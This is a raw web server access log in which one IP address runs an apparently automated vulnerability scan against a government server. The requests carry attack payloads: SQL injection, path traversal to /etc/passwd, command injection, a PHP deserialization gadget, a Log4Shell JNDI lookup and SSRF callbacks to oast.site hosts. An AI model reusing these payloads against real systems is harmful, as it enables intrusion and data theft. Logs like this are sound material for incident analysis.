Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 79 2023-08-03 14:14:09 103.153.214.94 GET /wp-admin/admin-ajax.php action=easync_success_and_save 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 181 2023-08-03 14:21:55 103.153.214.94 GET /system/deviceInfo auth=YWRtaW46MTEK 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 96 2023-08-03 14:25:55 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 63 2023-08-03 14:26:05 103.153.214.94 GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2TSGUzggIaJsts8ma3slPlkolOH.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 88 2023-08-03 14:26:11 103.153.214.94 POST /storfs-asup - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 68 2023-08-03 14:26:59 103.153.214.94 POST /api/jsonws/invoke - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData 404 7 0 70 2023-08-03 14:27:07 103.153.214.94 POST /api/jsonws/invoke - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn:8172/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData 404 7 0 57 2023-08-03 14:39:00 103.153.214.94 GET /index.asp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 91 2023-08-03 14:39:21 103.153.214.94 GET /tool/log/c.php strip_slashes=md5&host=2TSGVLQBO0jbGLi8PudTiQQJu0R 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 81 2023-08-03 14:43:14 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 115 2023-08-03 14:43:18 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 126 2023-08-03 14:43:21 103.153.214.94 GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 108 2023-08-03 14:48:08 103.153.214.94 GET / search==%00{.cookie|tCkoGd|value%3dCVE-2014-6287.} 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 122 2023-08-03 14:49:26 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 87 2023-08-03 14:51:26 103.153.214.94 GET /secure/ContactAdministrators!default.jspa - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 86 2023-08-03 14:51:55 103.153.214.94 GET /wp-admin/admin-ajax.php action=formcraft3_get&URL=https://cj5gsq24749fn87ofdl0q54uc8jbr3bza.oast.site 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 106 2023-08-03 15:01:11 103.153.214.94 POST /classes/Master.php f=delete_request 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 383 2023-08-03 15:01:25 103.153.214.94 GET /mims/updatecustomer.php customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 53 2023-08-03 15:04:26 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 98 2023-08-03 15:04:45 103.153.214.94 GET /.axiom/accounts/do.json - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 81 2023-08-03 15:12:16 103.153.214.94 GET /api/console/api_server sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 91 2023-08-03 15:14:41 103.153.214.94 POST /index.php/bbs/index/download url=/etc/passwd&name=1.txt&local=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 93 2023-08-03 15:16:14 103.153.214.94 POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 92 2023-08-03 15:16:22 103.153.214.94 GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2TSGV26l2xv1SRgh1LnXykozZKo.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 111 2023-08-03 15:17:25 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 93 2023-08-03 15:22:19 103.153.214.94 POST /apply_sec.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 61 2023-08-03 15:22:28 103.153.214.94 POST /apply_sec.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 67 2023-08-03 15:24:43 103.153.214.94 POST /cgi-bin/nightled.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 83 2023-08-03 15:29:07 103.153.214.94 POST /actions/authenticate.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 82 2023-08-03 15:31:05 103.153.214.94 GET /cgi-bin/logoff.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 91 2023-08-03 15:37:42 103.153.214.94 GET /index.php/catalogsearch/advanced/result/ name=e 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 86 2023-08-03 15:41:06 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 90 2023-08-03 15:44:22 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 97 2023-08-03 15:48:10 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 84 2023-08-03 15:50:56 103.153.214.94 GET /objects/getImage.php base64Url=YGlkID4gZW5hdWQudHh0YA===&format=png 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 79 2023-08-03 15:51:07 103.153.214.94 GET /objects/getImageMP4.php base64Url=YGlkID4gZW5hdWQudHh0YA===&format=jpg 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 55 2023-08-03 15:51:16 103.153.214.94 GET /objects/getSpiritsFromVideo.php base64Url=YGlkID4gZW5hdWQudHh0YA===&format=jpg 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 54 2023-08-03 15:51:27 103.153.214.94 GET /objects/enaud.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 75 2023-08-03 15:53:26 103.153.214.94 GET /BSW_cxttongr.htm - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 84 2023-08-03 16:01:07 103.153.214.94 POST /hybridity/api/sessions - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 78 2023-08-03 16:03:05 103.153.214.94 GET /users/sign_in - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 58 2023-08-03 16:08:20 103.153.214.94 GET / location=search 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 176 2023-08-03 16:08:46 103.153.214.94 POST /sitecore/shell/ClientBin/Reporting/Report.ashx - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 64 2023-08-03 16:12:10 103.153.214.94 POST /suite-auth/login - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 58 2023-08-03 16:23:55 103.153.214.94 GET /search/members/ id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 59 2023-08-03 16:25:16 103.153.214.94 GET / p=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 68 2023-08-03 16:25:52 103.153.214.94 POST /cobbler_api - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 76 2023-08-03 16:28:10 103.153.214.94 POST /v1/backend1 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 67 2023-08-03 16:28:19 103.153.214.94 GET /v1/2TSGVWmfic2YDJc0OfMOZnsUbik.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 56 2023-08-03 16:33:23 103.153.214.94 GET / wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 88 2023-08-03 16:38:30 103.153.214.94 POST /ispirit/interface/gateway.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 63 2023-08-03 16:44:01 103.153.214.94 POST /wp-content/plugins/wp-payeezy-pay/donate.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 84 2023-08-03 16:50:08 103.153.214.94 PUT /SDK/webLanguage - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 66 2023-08-03 16:50:16 103.153.214.94 GET /x - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 55 2023-08-03 16:51:03 103.153.214.94 GET / rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 244 2023-08-03 16:52:17 103.153.214.94 GET /fuel/pages/select/ filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 333 2023-08-03 16:53:57 103.153.214.94 GET /api/config - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 84 2023-08-03 16:58:42 103.153.214.94 POST /admin/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 88 2023-08-03 17:06:05 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 112 2023-08-03 17:09:51 103.153.214.94 GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 102 2023-08-03 17:09:59 103.153.214.94 GET /wp-admin/admin-post.php vrc_cmd=phpinfo 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 65 2023-08-03 17:10:43 103.153.214.94 GET /mobile/plugin/SyncUserInfo.jsp userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 71 2023-08-03 17:12:35 103.153.214.94 POST /wp-content/plugins/simple-file-list/ee-upload-engine.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 85 2023-08-03 17:12:43 103.153.214.94 POST /wp-content/plugins/simple-file-list/ee-file-engine.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 83 2023-08-03 17:12:51 103.153.214.94 GET /wp-content/uploads/simple-file-list/baedcbc.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 81 2023-08-03 17:13:24 103.153.214.94 POST /functionRouter - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 362 2023-08-03 17:23:34 103.153.214.94 POST /api/timelion/run - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 75 2023-08-03 17:23:40 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 78 2023-08-03 17:23:49 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 78 2023-08-03 17:26:00 103.153.214.94 POST /auth/newpassword - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 77 2023-08-03 17:30:54 103.153.214.94 GET /zimlet/com_zimbra_webex/httpPost.jsp companyId=http://cj5gsq24749fn87ofdl0pqbn3uhimthd3.oast.site%23 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 136 2023-08-03 17:39:34 103.153.214.94 POST /admin/auth/reset-password - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 62 2023-08-03 17:41:56 103.153.214.94 GET /snippets.inc.php search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 58 2023-08-03 17:47:31 103.153.214.94 GET /index.php r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 90 2023-08-03 17:47:57 103.153.214.94 GET /login - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 73 2023-08-03 17:48:02 103.153.214.94 POST /Collector/appliancesettings/applianceSettingsFileTransfer - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 55 2023-08-03 17:48:06 103.153.214.94 GET /talari/app/files/2TSGW0aFx8nEaS2frqKVy3GeJyK - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 55 2023-08-03 17:50:02 103.153.214.94 POST /cgi/networkDiag.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 381 2023-08-03 17:53:09 103.153.214.94 POST /index.php c=blocked&action=continue 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 93 2023-08-03 18:02:05 103.153.214.94 POST /user.action - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 60 2023-08-03 18:04:19 103.153.214.94 GET /api/hassio/app/.%2e/supervisor/info - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 400 0 0 63 2023-08-03 18:06:03 103.153.214.94 GET /plus/flink.php dopost=save&c=cat%20/etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 <?php+"system"($c);die;/*ref 404 7 0 68 2023-08-03 18:07:20 103.153.214.94 GET /server/node_upgrade_srv.js action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 68 2023-08-03 18:07:28 103.153.214.94 GET /server/node_upgrade_srv.js action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 80 2023-08-03 18:17:52 103.153.214.94 GET /cgi-bin/downloadFlile.cgi payload=`ls>../2TSGV6QOUe70pME4T6yhis1WgNz` 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 59 2023-08-03 18:17:56 103.153.214.94 GET /2TSGV6QOUe70pME4T6yhis1WgNz - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 91 2023-08-03 18:22:33 103.153.214.94 GET / x=${jndi:ldap://${:-224}${:-859}.${hostName}.uri.cj5gsq24749fn87ofdl0bmkq9ok3u91gq.oast.site/a} 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 69 2023-08-03 18:23:54 103.153.214.94 POST /boardDataWW.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 87 2023-08-03 18:30:20 103.153.214.94 POST /cgi 2 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 http://bcvt.kontum.gov.vn:8172/mainFrame.htm 404 7 0 91 2023-08-03 18:30:24 103.153.214.94 POST /cgi 7 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 http://bcvt.kontum.gov.vn:8172/mainFrame.htm 404 7 0 85 2023-08-03 18:36:24 103.153.214.94 GET / author=1 8172 - 111.90.143.37 - - 404 7 0 56 2023-08-03 18:40:12 103.153.214.94 POST /php/upload.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.5112.81+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 88 2023-08-03 18:40:20 103.153.214.94 GET /Uploads/2TSGUsdxaxDMnA45eGTOwNCePfo.php7 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 57 2023-08-03 18:46:09 103.153.214.94 GET /include/exportUser.php type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Egajk.txt 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 78 2023-08-03 18:46:19 103.153.214.94 GET /include/gajk.txt - 8172 - 111.90.143.37 